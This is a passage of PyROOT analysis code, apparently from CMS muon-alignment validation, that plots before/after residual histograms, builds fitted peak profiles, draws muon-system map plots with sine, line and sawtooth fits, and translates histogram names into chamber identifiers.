    ff.write("var MU_LIST = [\n")
    json.dump(mulist, ff)
    ff.write("];\n")
    ff.close()
    doTestsForReport(dts, reports)
    doTestsForReport(cscs, reports)
    loadTestResultsMap(run_name)
    doTestsForMapPlots(dts)
    doTestsForMapPlots(cscs)
    writeDQMReport(fname_dqm, run_name)
######################################################################################################
def plotmedians(reports1, reports2, selection=None, binsx=100, windowx=5., ceilingx=None, binsy=100, windowy=5.,
                ceilingy=None, binsdxdz=100, windowdxdz=5., ceilingdxdz=None, binsdydz=100, windowdydz=5., ceilingdydz=None,
                r1text=" before", r2text=" after", which="median"):
    """Draw before/after comparison histograms of per-chamber residual
    statistics (x, y, dx/dz, dy/dz) on the global canvas c1 (2x2 pads).

    reports1/reports2 -- "before" and "after" report lists; only chambers
        present with status PASS in both are filled (ME1/1a is skipped)
    selection -- optional predicate called with a chamber's postal address
    which -- statistic to plot: "median", "(big)mean", "(big)wmean",
        or "(big)stdev", mapped to report attributes via eval below
    Returns all created histograms plus the legend so the caller keeps
    them alive (ROOT objects are owned by the caller)."""
    tdrStyle.SetOptStat("emrou")
    tdrStyle.SetStatW(0.40)
    tdrStyle.SetStatFontSize(0.05)
    # keep the histograms in globals so ROOT does not garbage-collect them
    global hmediandxdz_after, hmediandxdz_before, hmediandxdz_beforecopy, \
           hmediandydz_after, hmediandydz_before, hmediandydz_beforecopy, \
           hmedianx_after, hmedianx_before, hmedianx_beforecopy, \
           hmediany_after, hmediany_before, hmediany_beforecopy, tlegend
    hmedianx_before = ROOT.TH1F("hmedianx_before", "", binsx, -windowx, windowx)
    hmediany_before = ROOT.TH1F("hmediany_before", "", binsy, -windowy, windowy)
    hmediandxdz_before = ROOT.TH1F("hmediandxdz_before", "", binsdxdz, -windowdxdz, windowdxdz)
    hmediandydz_before = ROOT.TH1F("hmediandydz_before", "", binsdydz, -windowdydz, windowdydz)
    hmedianx_after = ROOT.TH1F("hmedianx_after", "", binsx, -windowx, windowx)
    hmediany_after = ROOT.TH1F("hmediany_after", "", binsy, -windowy, windowy)
    hmediandxdz_after = ROOT.TH1F("hmediandxdz_after", "", binsdxdz, -windowdxdz, windowdxdz)
    hmediandydz_after = ROOT.TH1F("hmediandydz_after", "", binsdydz, -windowdydz, windowdydz)
    # translate `which` into the report attribute suffixes used in eval below
    if which == "median":
        whichx = whichy = whichdxdz = whichdydz = "median"
    elif which == "bigmean":
        whichx = "mean30"
        whichy = "mean30"
        whichdxdz = "mean20"
        whichdydz = "mean50"
    elif which == "mean":
        whichx = "mean15"
        whichy = "mean15"
        whichdxdz = "mean10"
        whichdydz = "mean25"
    elif which == "bigwmean":
        whichx = "wmean30"
        whichy = "wmean30"
        whichdxdz = "wmean20"
        whichdydz = "wmean50"
    elif which == "wmean":
        whichx = "wmean15"
        whichy = "wmean15"
        whichdxdz = "wmean10"
        whichdydz = "wmean25"
    elif which == "bigstdev":
        whichx = "stdev30"
        whichy = "stdev30"
        whichdxdz = "stdev20"
        whichdydz = "stdev50"
    elif which == "stdev":
        whichx = "stdev15"
        whichy = "stdev15"
        whichdxdz = "stdev10"
        whichdydz = "stdev25"
    else:
        raise Exception(which + " not recognized")
    for r1 in reports1:
        if selection is None or (selection.__code__.co_argcount == len(r1.postal_address) and selection(*r1.postal_address)):
            found = False
            for r2 in reports2:
                if r1.postal_address == r2.postal_address:
                    found = True
                    break
            if not found: continue
            #skip ME1/1a
            if r1.postal_address[0]=='CSC':
                if r1.postal_address[2]==1 and r1.postal_address[3]==4: continue
            if r1.status == "PASS" and r2.status == "PASS":
                # factors 10. and 1000. convert cm->mm and rad->mrad
                hmedianx_before.Fill(10.*eval("r1.%s_x" % whichx))
                hmediandxdz_before.Fill(1000.*eval("r1.%s_dxdz" % whichdxdz))
                hmedianx_after.Fill(10.*eval("r2.%s_x" % whichx))
                hmediandxdz_after.Fill(1000.*eval("r2.%s_dxdz" % whichdxdz))
                if r1.median_y is not None:
                    hmediany_before.Fill(10.*eval("r1.%s_y" % whichy))
                    hmediandydz_before.Fill(1000.*eval("r1.%s_dydz" % whichdydz))
                    hmediany_after.Fill(10.*eval("r2.%s_y" % whichy))
                    hmediandydz_after.Fill(1000.*eval("r2.%s_dydz" % whichdydz))
    # dashed outline copies of the "before" histograms, drawn on top
    hmedianx_beforecopy = hmedianx_before.Clone()
    hmediany_beforecopy = hmediany_before.Clone()
    hmediandxdz_beforecopy = hmediandxdz_before.Clone()
    hmediandydz_beforecopy = hmediandydz_before.Clone()
    hmedianx_beforecopy.SetLineStyle(2)
    hmediany_beforecopy.SetLineStyle(2)
    hmediandxdz_beforecopy.SetLineStyle(2)
    hmediandydz_beforecopy.SetLineStyle(2)
    hmedianx_before.SetFillColor(ROOT.kMagenta+2)
    hmediany_before.SetFillColor(ROOT.kMagenta+2)
    hmediandxdz_before.SetFillColor(ROOT.kMagenta+2)
    hmediandydz_before.SetFillColor(ROOT.kMagenta+2)
    hmedianx_after.SetFillColor(ROOT.kYellow)
    hmediany_after.SetFillColor(ROOT.kYellow)
    hmediandxdz_after.SetFillColor(ROOT.kYellow)
    hmediandydz_after.SetFillColor(ROOT.kYellow)
    hmedianx_after.SetXTitle("median(#Deltax) (mm)")
    hmediany_after.SetXTitle("median(#Deltay) (mm)")
    hmediandxdz_after.SetXTitle("median(#Deltadx/dz) (mrad)")
    hmediandydz_after.SetXTitle("median(#Deltadydz) (mrad)")
    hmedianx_after.GetXaxis().CenterTitle()
    hmediany_after.GetXaxis().CenterTitle()
    hmediandxdz_after.GetXaxis().CenterTitle()
    hmediandydz_after.GetXaxis().CenterTitle()
    if ceilingx is not None: hmedianx_after.SetAxisRange(0., ceilingx, "Y")
    if ceilingy is not None: hmediany_after.SetAxisRange(0., ceilingy, "Y")
    if ceilingdxdz is not None: hmediandxdz_after.SetAxisRange(0., ceilingdxdz, "Y")
    if ceilingdydz is not None: hmediandydz_after.SetAxisRange(0., ceilingdydz, "Y")
    c1.Clear()
    c1.Divide(2, 2)
    c1.GetPad(1).cd()
    hmedianx_after.Draw()
    hmedianx_before.Draw("same")
    hmedianx_after.Draw("same")
    hmedianx_beforecopy.Draw("same")
    hmedianx_after.Draw("axissame")
    tlegend = ROOT.TLegend(0.17, 0.75-0.05, 0.45+0.05, 0.9)
    tlegend.SetFillColor(ROOT.kWhite)
    tlegend.SetBorderSize(0)
    tlegend.AddEntry(hmedianx_after, r2text, "f")
    tlegend.AddEntry(hmedianx_before, r1text, "f")
    tlegend.Draw()
    c1.GetPad(2).cd()
    hmediandxdz_after.Draw()
    hmediandxdz_before.Draw("same")
    hmediandxdz_after.Draw("same")
    hmediandxdz_beforecopy.Draw("same")
    hmediandxdz_after.Draw("axissame")
    c1.GetPad(3).cd()
    hmediany_after.Draw()
    hmediany_before.Draw("same")
    hmediany_after.Draw("same")
    hmediany_beforecopy.Draw("same")
    hmediany_after.Draw("axissame")
    c1.GetPad(4).cd()
    hmediandydz_after.Draw()
    hmediandydz_before.Draw("same")
    hmediandydz_after.Draw("same")
    hmediandydz_beforecopy.Draw("same")
    hmediandydz_after.Draw("axissame")
    return hmediandxdz_after, hmediandxdz_before, hmediandxdz_beforecopy, \
           hmediandydz_after, hmediandydz_before, hmediandydz_beforecopy, \
           hmedianx_after, hmedianx_before, hmedianx_beforecopy, \
           hmediany_after, hmediany_before, hmediany_beforecopy, tlegend
######################################################################################################
def createPeaksProfile(the2d, rebin=1):
    """Build a "peaks" profile from a TH2: for every group of `rebin` x-bins,
    fit a Gaussian to the y-projection and store its peak position and error
    in the corresponding bin of a 1D histogram.  When the fit fails or there
    are too few entries, fall back to the projection's mean (Student-t
    scaled error), or zero for (nearly) empty slices.  Returns the new TH1."""
    # remove a leftover histogram with the same name from a previous call
    htmp = ROOT.gROOT.FindObject(the2d.GetName()+"_peaks")
    if htmp != None: htmp.Delete()
    hpeaks = the2d.ProjectionX(the2d.GetName()+"_peaks")
    hpeaks.Reset()
    hpeaks.Rebin(rebin)
    bad_fit_bins = []
    for i in xrange(0, int(the2d.GetNbinsX()), rebin):
        tmp = the2d.ProjectionY("tmp", i+1, i + rebin)
        nn = tmp.GetEntries()
        # fit range: mean +- 2*RMS of the slice
        drange = tmp.GetRMS()
        drange = 2.*drange
        fgaus = ROOT.TF1("fgaus","gaus", tmp.GetMean() - drange, tmp.GetMean() + drange)
        fgaus.SetParameter(0,nn)
        fgaus.SetParameter(1,tmp.GetMean())
        fgaus.SetParameter(2,tmp.GetRMS())
        #print " ", i, nn, tmp.GetMean() , drange, "[", tmp.GetMean() - drange, tmp.GetMean() + drange, ']'
        fitOk = False
        if nn > 10: # good to fit
            fr = tmp.Fit("fgaus","RNSQ")
            #print " ", fgaus.GetParameter(1), " +- ", fgaus.GetParError(1), " fitres = " , fr.Status() , fr.CovMatrixStatus()
            hpeaks.SetBinContent(i/rebin+1, fgaus.GetParameter(1))
            hpeaks.SetBinError(i/rebin+1, fgaus.GetParError(1))
            # require a converged fit with an accurate covariance matrix
            if fr.Status()==0 and fr.CovMatrixStatus()==3 : fitOk = True
        if not fitOk:
            bad_fit_bins.append(i/rebin+1)
            if nn > 1. and tmp.GetRMS() > 0: # use mean
                hpeaks.SetBinContent(i/rebin+1, tmp.GetMean())
                hpeaks.SetBinError(i/rebin+1, ROOT.TMath.StudentQuantile(0.841345,nn) * tmp.GetRMS() / sqrt(nn))
            else:
                hpeaks.SetBinContent(i/rebin+1, 0.)
                hpeaks.SetBinError(i/rebin+1, 0.)
    if len(bad_fit_bins): print "createPeaksProfile bad fit bins: ", bad_fit_bins
    return hpeaks
######################################################################################################
def mapplot(tfiles, name, param, mode="from2d", window=10., abscissa=None, title="",
            widebins=False, fitsine=False, fitline=False, reset_palette=False, fitsawteeth=False, fitpeaks=False, peaksbins=1, fixfitpars={}, **args):
    """Draw one muon-system map plot (residual `param` vs phi/z/R) from the
    AlignmentMonitorMuonSystemMap1D histograms found in `tfiles`.

    Draws the summed 2D histogram, a mean-per-slice profile and a
    Gaussian-peak profile on the global canvas; optionally fits a
    constant+sine (recording coefficients in MAP_RESULTS_FITSIN), a
    straight line, or per-sector sawtooth functions (recording results in
    MAP_RESULTS_SAWTOOTH).  Returns the profile histogram.

    NOTE(review): fixfitpars uses a mutable default argument; safe only
    as long as callers never mutate it."""
    tdrStyle.SetOptTitle(1)
    tdrStyle.SetTitleBorderSize(0)
    tdrStyle.SetOptStat(0)
    #tdrStyle.SetOptStat("emrou")
    tdrStyle.SetOptFit(0)
    tdrStyle.SetTitleFontSize(0.05)
    tdrStyle.SetPadRightMargin(0.1) # to see the pallete labels on the left
    c1.Clear()
    c1.ResetAttPad()
    if reset_palette: set_palette("blues")
    global hist, hist2d, hist2dweight, tline1, tline2, tline3
    # the fits need a valid cell id to store their results under
    if fitsine or fitsawteeth:
        id = mapNameToId(name)
        if not id:
            print "bad id for ", name
            raise Exception
    hdir = "AlignmentMonitorMuonSystemMap1D/iter1/"
    hpref= "%s_%s" % (name, param)
    hhh = hdir+hpref
    # "ALL"-chamber maps are built by summing the individual chamber histograms
    combine_all = False
    if "ALL" in name and ("CSCvsr" in name or "DTvsz" in name): combine_all = True
    # an auxiliary 1D distribution exists only for x-vs-phi maps
    add1d =  ("vsphi" in name) and (param == "x")
    if "h2d" in args:
        hist2d = args["h2d"].Clone(hpref+"_2d_")
        if "CSC" in name and add1d: hist1d = args["h1d"].Clone(hpref+"_1d_")
    elif combine_all:
        nch = 12
        if "DT" in name and name[6:9]=='st4': nch = 14
        if "CSC" in name: nch = 36
        chambers = ["%02d" % ch for ch in range (2,nch+1)]
        # start from chamber 01 and add all the others, from all files
        ch_hhh = hhh.replace('ALL','01')
        ch_hpref = hpref.replace('ALL','01')
        hist2d = tfiles[0].Get(ch_hhh+"_2d").Clone(ch_hpref+"_2d_")
        if "CSC" in name and add1d: hist1d = tfiles[0].Get(ch_hhh+"_1d").Clone(ch_hpref+"_1d_")
        for ch in chambers:
            ch_hhh = hhh.replace('ALL',ch)
            ch_hpref = hpref.replace('ALL',ch)
            hist2d.Add(tfiles[0].Get(ch_hhh+"_2d"))
            if "CSC" in name and add1d: hist1d.Add(tfiles[0].Get(ch_hhh+"_1d"))
            for tfile in tfiles[1:]:
                hist2d.Add(tfile.Get(ch_hhh+"_2d"))
                if "CSC" in name and add1d: hist1d.Add(tfile.Get(ch_hhh+"_1d"))
    else:
        hist2d = tfiles[0].Get(hhh+"_2d").Clone(hpref+"_2d_")
        if "CSC" in name and add1d: hist1d = tfiles[0].Get(hhh+"_1d").Clone(hpref+"_1d_")
        for tfile in tfiles[1:]:
            hist2d.Add(tfile.Get(hhh+"_2d"))
            if "CSC" in name and add1d: hist1d.Add(tfile.Get(hhh+"_1d"))
    if mode == "from2d":
        # build the profile: per-slice mean with a Student-t scaled error
        the2d = hist2d
        hist = the2d.ProjectionX()
        hist.Reset()
        skip = 1
        if widebins:
            hist.Rebin(10)
            skip = 10
        #f = ROOT.TF1("g", "gaus", -40., 40)
        for i in xrange(0, int(the2d.GetNbinsX()), skip):
            tmp = the2d.ProjectionY("tmp", i+1, i + skip)
            if tmp.GetEntries() > 1:
                #tmp.Fit("g","LNq")
                hist.SetBinContent(i/skip+1, tmp.GetMean())
                hist.SetBinError(i/skip+1, ROOT.TMath.StudentQuantile(0.841345,tmp.GetEntries()) * tmp.GetRMS() / sqrt(tmp.GetEntries()))
                #hist.SetBinError(i/skip+1, tmp.GetRMS() / sqrt(tmp.GetEntries()))
                #hist.SetBinError(i/skip+1, f.GetParameter(2))
            else:
                #hist.SetBinContent(i/skip+1, 2000.)
                #hist.SetBinError(i/skip+1, 1000.)
                hist.SetBinContent(i/skip+1, 0.)
                hist.SetBinError(i/skip+1, 0.)
        hpeaks = createPeaksProfile(the2d, peaksbins)
    else:
        raise Exception
    # axis ranges, titles and drawing
    hist.SetAxisRange(-window, window, "Y")
    if abscissa is not None: hist.SetAxisRange(abscissa[0], abscissa[1], "X")
    hist.SetMarkerStyle(20)
    hist.SetMarkerSize(0.75)
    hist.GetXaxis().CenterTitle()
    hist.GetYaxis().CenterTitle()
    hist.GetYaxis().SetTitleOffset(0.75)
    hist.GetXaxis().SetTitleSize(0.05)
    hist.GetYaxis().SetTitleSize(0.05)
    hist.SetTitle(title)
    if "vsphi" in name: hist.SetXTitle("Global #phi position (rad)")
    elif "vsz" in name: hist.SetXTitle("Global z position (cm)")
    elif "vsr" in name: hist.SetXTitle("Global R position (cm)")
    if "DT" in name:
        if param == "x": hist.SetYTitle("x' residual (mm)")
        if param == "dxdz": hist.SetYTitle("dx'/dz residual (mrad)")
        if param == "y": hist.SetYTitle("y' residual (mm)")
        if param == "dydz": hist.SetYTitle("dy'/dz residual (mrad)")
    if "CSC" in name:
        if param == "x": hist.SetYTitle("r#phi residual (mm)")
        if param == "dxdz": hist.SetYTitle("d(r#phi)/dz residual (mrad)")
    hist.SetMarkerColor(ROOT.kBlack)
    hist.SetLineColor(ROOT.kBlack)
    hist.Draw()
    hist2d.Draw("colzsame")
    if widebins: hist.Draw("samee1")
    else: hist.Draw("same")
    hpeaks.SetMarkerStyle(20)
    hpeaks.SetMarkerSize(0.9)
    hpeaks.SetMarkerColor(ROOT.kRed)
    hpeaks.SetLineColor(ROOT.kRed)
    hpeaks.SetLineWidth(2)
    #if fitpeaks: hpeaks.Draw("same")
    hpeaks.Draw("same")
    # optional constant+sine fit for phi maps
    if fitsine and "vsphi" in name:
        global fitsine_const, fitsine_sin, fitsine_cos, fitsine_chi2, fitsine_ndf
        if 'CSC' in name:
            f = ROOT.TF1("f", "[0] + [1]*sin(x) + [2]*cos(x)", -pi/180.*5., pi*(2.-5./180.))
        else:
            f = ROOT.TF1("f", "[0] + [1]*sin(x) + [2]*cos(x)", -pi, pi)
        f.SetLineColor(ROOT.kRed)
        f.SetLineWidth(2)
        if len(fixfitpars)>0:
            for fpar in fixfitpars.keys():
                f.FixParameter(fpar, fixfitpars[fpar])
        #hist.Fit(f,"N")
        if fitpeaks: hpeaks.Fit(f,"NQ")
        else: hist.Fit(f,"NEQ")
        if len(fixfitpars)>0:
            for fpar in fixfitpars.keys():
                f.ReleaseParameter(fpar)
        fitsine_const = f.GetParameter(0), f.GetParError(0)
        fitsine_sin = f.GetParameter(1), f.GetParError(1)
        fitsine_cos = f.GetParameter(2), f.GetParError(2)
        fitsine_chi2 = f.GetChisquare()
        fitsine_ndf = f.GetNDF()
        global MAP_RESULTS_FITSIN
        # 'phi' coefficienct will be updated further for CSC
        MAP_RESULTS_FITSIN[id] = {'a':fitsine_const, 'phi':fitsine_const, 'sin': fitsine_sin, 'cos': fitsine_cos, 'chi2': fitsine_chi2, 'ndf': fitsine_ndf}
        f.Draw("same")
        global fitsine_ttext, fitsine_etext
        text_xposition = -1.
        if 'CSC' in name: text_xposition = 2.
        fitsine_ttext = ROOT.TLatex(text_xposition, 0.8*window,
                                    "%+.3f %+.3f sin#phi %+.3f cos#phi" % (fitsine_const[0], fitsine_sin[0], fitsine_cos[0]))
        fitsine_ttext.SetTextColor(ROOT.kRed)
        fitsine_ttext.SetTextSize(0.05)
        fitsine_ttext.Draw()
        fitsine_etext = ROOT.TLatex(text_xposition, 0.70*window,
                                    " #pm%.3f   #pm%.3f        #pm%.3f" % (fitsine_const[1], fitsine_sin[1], fitsine_cos[1]))
        fitsine_etext.SetTextColor(ROOT.kRed)
        fitsine_etext.SetTextSize(0.045)
        fitsine_etext.Draw()
        # additional estimate of phiz ring rotation from 1d distribution
        if 'CSC' in name and add1d:
            # zero-order rough fit to obtain the fitting range:
            f0 = ROOT.TF1("f0", "gaus", hist1d.GetBinLowEdge(1), -hist1d.GetBinLowEdge(1))
            fit = hist1d.Fit(f0,"NRQ")
            rangea, rangeb = hist1d.GetMean() - hist1d.GetRMS(), hist1d.GetMean() + hist1d.GetRMS()
            if fit==0: rangea, rangeb = f0.GetParameter(1) - f0.GetParameter(2), f0.GetParameter(1) + f0.GetParameter(2)
            #print rangea, rangeb
            # second fit for finding the peak:
            f1 = ROOT.TF1("f1", "gaus", rangea, rangeb)
            fit = hist1d.Fit(f1,"NRQ")
            nn = hist1d.GetEntries()
            dphiz, ephiz = 0, 0
            if nn>0: dphiz, ephiz = hist1d.GetMean(), ROOT.TMath.StudentQuantile(0.841345,nn) * hist1d.GetRMS() / sqrt(nn)
            if fit==0: dphiz, ephiz = f1.GetParameter(1), f1.GetParError(1)
            #print dphiz, ephiz
            MAP_RESULTS_FITSIN[id]['phi'] = (dphiz, ephiz)
            global ttex_sine_, ttex_sine, ttex_1d_, ttex_1d
            postal_address = idToPostalAddress(id+'/01')
            ttex_sine_ = ROOT.TLatex(0, 0.8*window,"#Delta#phi_{z}^{sine} (mrad):")
            ttex_sine_.SetTextColor(ROOT.kGreen+2); ttex_sine_.SetTextSize(0.04); ttex_sine_.Draw()
            ttex_sine = ROOT.TLatex(0, 0.7*window," %+.3f#pm%.3f" %
                                    (-100*fitsine_const[0]/signConventions[postal_address][3],
                                     100*fitsine_const[1]/signConventions[postal_address][3]))
            ttex_sine.SetTextColor(ROOT.kGreen+2); ttex_sine.SetTextSize(0.04); ttex_sine.Draw()
            ttex_1d_ = ROOT.TLatex(0, 0.6*window,"#Delta#phi_{z}^{phi} (mrad):")
            ttex_1d_.SetTextColor(ROOT.kGreen+2); ttex_1d_.SetTextSize(0.04); ttex_1d_.Draw()
            ttex_1d = ROOT.TLatex(0, 0.5*window," %+.3f#pm%.3f" % (-dphiz, ephiz))
            ttex_1d.SetTextColor(ROOT.kGreen+2); ttex_1d.SetTextSize(0.04); ttex_1d.Draw()
            ROOT.gPad.Update()
    # optional straight-line fit for z/R maps
    if fitline:
        f = ROOT.TF1("f", "[0] + [1]*x", -1000., 1000.)
        hist2d.Fit(f, "q")
        hist2d.GetFunction("f").SetLineColor(ROOT.kRed)
        global fitline_const, fitline_linear, fitline_chi2, fitline_ndf
        fitline_const = hist2d.GetFunction("f").GetParameter(0), hist2d.GetFunction("f").GetParError(0)
        fitline_linear = hist2d.GetFunction("f").GetParameter(1), hist2d.GetFunction("f").GetParError(1)
        fitline_chi2 = hist2d.GetFunction("f").GetChisquare()
        fitline_ndf = hist2d.GetFunction("f").GetNDF()
        hist2d.GetFunction("f").Draw("same")
        global fitline_ttext
        if "vsz" in name: which = "Z"
        elif "vsr" in name: which = "R"
        fitline_ttext = ROOT.TText(hist.GetBinCenter(hist.GetNbinsX()/4),
                                   0.8*window, "%.3g %+.3g %s" % (fitline_const[0], fitline_linear[0], which))
        fitline_ttext.SetTextColor(ROOT.kRed)
        fitline_ttext.Draw()
    ROOT.gPad.RedrawAxis()
    # chamber-boundary guide lines and the window frame
    if "vsphi" in name:
        if not widebins: philines(name, window, abscissa)
        if abscissa is None:
            if 'CSC' in name:
                tline1 = ROOT.TLine(-pi/180.*5., 0, pi*(2.-5./180.), 0); tline1.Draw()
                tline2 = ROOT.TLine(-pi/180.*5., -window, pi*(2.-5./180.), -window); tline2.SetLineWidth(2); tline2.Draw()
                tline3 = ROOT.TLine(-pi/180.*5., window, pi*(2.-5./180.), window); tline3.Draw()
            else:
                tline1 = ROOT.TLine(-pi, 0, pi, 0); tline1.Draw()
                tline2 = ROOT.TLine(-pi, -window, pi, -window); tline2.SetLineWidth(2); tline2.Draw()
                tline3 = ROOT.TLine(-pi, window, pi, window); tline3.Draw()
        else:
            tline1 = ROOT.TLine(abscissa[0], 0, abscissa[1], 0); tline1.Draw()
            tline2 = ROOT.TLine(abscissa[0], -window, abscissa[1], -window); tline2.SetLineWidth(2); tline2.Draw()
            tline3 = ROOT.TLine(abscissa[0], window, abscissa[1], window); tline3.Draw()
    elif "vsz" in name:
        if not widebins: zlines(window, abscissa)
        if abscissa is None:
            tline1 = ROOT.TLine(-660, 0, 660, 0); tline1.Draw()
            tline2 = ROOT.TLine(-660, -window, 660, -window); tline2.SetLineWidth(2); tline2.Draw()
            tline3 = ROOT.TLine(-660, window, 660, window); tline3.Draw()
        else:
            tline1 = ROOT.TLine(abscissa[0], 0, abscissa[1], 0); tline1.Draw()
            tline2 = ROOT.TLine(abscissa[0], -window, abscissa[1], -window); tline2.SetLineWidth(2); tline2.Draw()
            tline3 = ROOT.TLine(abscissa[0], window, abscissa[1], window); tline3.Draw()
    elif "vsr" in name:
        if "mem1" in name or "mep1" in name and not widebins: rlines(1, window, abscissa)
        if "mem2" in name or "mep2" in name and not widebins: rlines(2, window, abscissa)
        if "mem3" in name or "mep3" in name and not widebins: rlines(3, window, abscissa)
        if "mem4" in name or "mep4" in name and not widebins: rlines(4, window, abscissa)
        if abscissa is None:
            tline1 = ROOT.TLine(100, 0, 700, 0); tline1.Draw()
            tline2 = ROOT.TLine(100, -window, 700, -window); tline2.SetLineWidth(2); tline2.Draw()
            tline3 = ROOT.TLine(100, window, 700, window); tline3.Draw()
        else:
            tline1 = ROOT.TLine(abscissa[0], 0, abscissa[1], 0); tline1.Draw()
            tline2 = ROOT.TLine(abscissa[0], -window, abscissa[1], -window); tline2.SetLineWidth(2); tline2.Draw()
            tline3 = ROOT.TLine(abscissa[0], window, abscissa[1], window); tline3.Draw()
    # optional per-sector sawtooth fit (compiled C++ fit functions)
    if "vsphi" in name and fitsawteeth:
        global CPP_LOADED
        if not CPP_LOADED:
            phiedges2c()
            ROOT.gROOT.ProcessLine(".L phiedges_fitfunctions.C++")
            CPP_LOADED = True
        fn={0: ROOT.fitf0,
            1: ROOT.fitf2,
            2: ROOT.fitf2,
            3: ROOT.fitf3,
            4: ROOT.fitf4,
            5: ROOT.fitf5,
            6: ROOT.fitf6,
            7: ROOT.fitf7,
            8: ROOT.fitf8,
            9: ROOT.fitf9,
            10: ROOT.fitf10,
            11: ROOT.fitf11,
            12: ROOT.fitf12,
            13: ROOT.fitf13
            } [stationIndex(name)]
        fn.SetNpx(5000)
        fn.SetLineColor(ROOT.kYellow)
        hist.Fit(fn,"N")
        fn.Draw("same")
        # get properly arranged phi edges
        edges = (phiedges[stationIndex(name)])[:]
        ed = sorted(edges)
        # add some padding to the end
        ed.append(pi+abs(ed[0]))
        global sawtooth_a, sawtooth_b
        sawtooth_a = []
        sawtooth_da = []
        sawtooth_b = []
        for pr in range(0,fn.GetNpar(),2):
            sawtooth_a.append( (fn.GetParameter(pr), fn.GetParError(pr)) )
            sawtooth_b.append( (fn.GetParameter(pr+1), fn.GetParError(pr+1)) )
            sawtooth_da.append( (fn.Eval(ed[pr/2]+0.01), fn.Eval(ed[pr/2+1]-0.01)) )
        global MAP_RESULTS_SAWTOOTH
        MAP_RESULTS_SAWTOOTH[id] = {'a': sawtooth_a, 'da': sawtooth_da, 'b': sawtooth_b, 'chi2': fn.GetChisquare(), 'ndf': fn.GetNDF()}
    # fill number of contributiong bins
    #ROOT.SetOwnership(hist,False)
    # hand ownership to the caller so PyROOT does not delete the drawn objects
    ROOT.SetOwnership(hist2d,False)
    ROOT.SetOwnership(hist,False)
    ROOT.SetOwnership(tline1,False)
    ROOT.SetOwnership(tline2,False)
    ROOT.SetOwnership(tline3,False)
    return hist
def mapNameToId(name):
    """Translate a system-map histogram name (e.g. "DTvsz_st4sec07",
    "CSCvsr_mep1ch03") into a cell id string such as "MB-ALL/4/07",
    "MB-2/1", "ME+1/ALL/03" or "ME+2/1".  Returns None when the name
    cannot be parsed."""
    if "DT" in name:
        pwh = name.find('wh')
        wh = name[pwh + 2] if pwh > 1 else "-ALL"
        translate = {"A": "-2", "B": "-1", "C": "-0", "D": "+1", "E": "+2", "-ALL": "-ALL"}
        if wh not in translate: return None
        w = translate[wh]
        if w == "-ALL":
            # chamber-level map: station digit precedes 'sec', sector follows it
            psec = name.find('sec')
            if psec < 0: return None
            return "MB%s/%s/%s" % (w, name[psec - 1], name[psec + 3:psec + 5])
        # wheel/station map: station digit follows 'st'
        pst = name.find('st')
        if pst <= 1: return None
        return "MB%s/%s" % (w, name[pst + 2])
    elif "CSC" in name:
        pme = name.find('me')
        if pme < 0: return None
        endcap = {"p": "+", "m": "-"}.get(name[pme + 2])
        if endcap is None: return None
        station = name[pme + 3]
        pch = name.find('ch')
        if pch < 0:
            # station/ring map: ring digit follows the station
            return "ME%s%s/%s" % (endcap, station, name[pme + 4])
        # chamber-level map across all rings
        return "ME%s%s/ALL/%s" % (endcap, station, name[pch + 2:pch + 4])
    return None
##################################################################################
# "param" may be one of "deltax" (Delta x position residuals),
# "deltadxdz" (Delta (dx/dz) angular residuals),
# "curverr" (Delta x * d(Delta q/pT)/d(Delta x) = Delta q/pT in the absence of misalignment)
def curvatureplot(tfiles, name, param, mode="from2d", window=15., widebins=False, title="", fitgauss=False, fitconst=False, fitline=False, fitpeaks=True, reset_palette=False):
    """Draw a residual-vs-curvature plot for one chamber or a chamber group.

    tfiles: open ROOT files whose histograms are summed together
    name:   chamber name like "wheelm2_sector01", or "all"/"top"/"bottom"
            to accumulate over wheels and sectors
    param:  histogram suffix such as "deltax", "deltadxdz", "curverr", "pterr"
    mode:   "plain" draws the stored TProfile directly; "from2d" rebuilds
            the profile from slices of the TH2F
    window: half-range of the vertical axis
    fitgauss/fitconst/fitline: optional fits overlaid on the plot; fitpeaks
            fits the peak profile (hpeaks) instead of the mean profile
    Results are communicated via module-level globals (hist, hist2d,
    fitgauss_diff, fitline_intercept, fitline_slope, ...).
    """
    # Canvas/style setup for this kind of plot.
    tdrStyle.SetOptTitle(1)
    tdrStyle.SetTitleBorderSize(0)
    tdrStyle.SetOptStat(0)
    tdrStyle.SetOptFit(0)
    tdrStyle.SetTitleFontSize(0.05)
    c1.Clear()
    if reset_palette: set_palette("blues")
    # Published as globals so interactive sessions / callers can inspect them.
    global hist, histCOPY, hist2d, tline1, tline2, tline3, tline4, tline5

    hdir = "AlignmentMonitorMuonVsCurvature/iter1/"

    if name not in ("all", "top", "bottom"):
        # Single chamber: clone from the first file, then add the rest.
        hsuffix = "_%s_%s" % (name, param)
        prof = tfiles[0].Get(hdir+"tprofile"+hsuffix).Clone("tprofile_"+hsuffix)
        hist2d = tfiles[0].Get(hdir+"th2f"+hsuffix).Clone("th2f_"+hsuffix)
        for tfile in tfiles[1:]:
            prof.Add(tfile.Get(hdir+"tprofile"+hsuffix))
            hist2d.Add(tfile.Get(hdir+"th2f"+hsuffix))
    else:
        # Chamber group: accumulate over all wheels and the selected sectors.
        prof = None
        hist2d = None
        for wheel in "m2", "m1", "z", "p1", "p2":
            if name == "all": sectors = "01", "02", "03", "04", "05", "06", "07", "08", "09", "10", "11", "12"
            elif name == "top": sectors = "01", "02", "03", "04", "05", "06"
            elif name == "bottom": sectors = "07", "08", "09", "10", "11", "12"
            else: raise Exception
            for sector in sectors:
                hsuffix = "_%s_%s" % ("wheel%s_sector%s" % (wheel, sector), param)
                for tfile in tfiles:
                    if prof is None:
                        # First histogram seen: clone it; afterwards just add.
                        prof = tfiles[0].Get(hdir+"tprofile"+hsuffix).Clone("tprofile_"+hsuffix)
                        hist2d = tfiles[0].Get(hdir+"th2f"+hsuffix).Clone("tprofile_"+hsuffix)
                    else:
                        prof.Add(tfile.Get(hdir+"tprofile"+hsuffix))
                        hist2d.Add(tfile.Get(hdir+"th2f"+hsuffix))

    # 1D histogram over the symmetric curvature range of the profile.
    hist = ROOT.TH1F("hist", "", prof.GetNbinsX(), prof.GetBinLowEdge(1), -prof.GetBinLowEdge(1))
    for i in xrange(1, prof.GetNbinsX()+1):
        hist.SetBinContent(i, prof.GetBinContent(i))
        hist.SetBinError(i, prof.GetBinError(i))

    if mode == "plain":
        hist = prof
    elif mode == "from2d":
        # Rebuild the profile from Y-projections of the 2D histogram.
        skip = 1
        if widebins:
            hist.Rebin(5)
            skip = 5
        # Remove any leftover projection with the same name from a prior call.
        htmp = ROOT.gROOT.FindObject("tmp")
        if htmp != None: htmp.Delete()
